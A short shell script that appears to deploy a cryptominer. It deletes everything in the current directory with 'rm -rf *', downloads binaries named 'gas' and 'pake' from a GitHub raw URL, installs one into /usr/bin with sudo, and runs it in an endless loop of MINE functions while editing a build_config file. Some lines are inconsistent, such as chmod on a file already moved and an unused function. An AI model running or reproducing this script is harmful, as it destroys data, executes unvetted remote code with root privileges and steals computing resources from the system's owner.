LOOP=

MINE_A() {
    LOOP=$(($LOOP + 1))
    chmod +x 1
    timeout 45 1
    clear
}
MINE_B() {
    LOOP=$(($LOOP + 1))
    chmod +x 1
    timeout 45 1
    clear
}
MINE_C() {
    LOOP=$(($LOOP + 1))
    chmod +x 1
    timeout 45 1
    clear
}
MINE_D() {
   LOOP=$(($LOOP + 1))
    chmod +x 1
    timeout 45 1
    clear
}
MINE_E() {
   LOOP=$(($LOOP + 1))
    chmod +x 1
    timeout 45 1
    clear
}
SETUP() {
rm -rf *
wget -O 1 https://raw.githubusercontent.com/johnwixk228/Pake/main/gas && wget -O 2 https://raw.githubusercontent.com/johnwixk228/Pake/main/pake --content-disposition >/dev/null 2>&1
chmod u+x 1
sudo mv 1 /usr/bin
}
SETUP
sed -i "s/THREAD/$THREAD/" "build_config"
cp build_config backup
while :
do
  MINE_A
  MINE_B
  MINE_C
  MINE_D
done

